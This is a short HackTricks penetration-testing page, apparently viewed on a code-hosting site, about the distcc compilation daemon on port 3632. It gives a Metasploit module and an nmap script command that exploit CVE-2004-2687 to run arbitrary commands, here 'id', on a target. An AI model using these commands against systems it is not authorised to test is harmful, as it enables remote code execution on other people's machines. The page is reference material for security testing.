hacktricks/pentesting/3632-pentesting-distcc.md

33 lines
1,003 B
Markdown
Raw Normal View History

# 3632 - Pentesting distcc
## Basic Information
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
2021-11-30 13:55:54 +00:00
**Default port: **3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
## Exploitation
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
```
2020-10-05 10:16:52 +00:00
## Shodan
_I don't think shodan detects this service._
## Resources
2021-11-30 13:55:54 +00:00
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Álex B (@r1p)**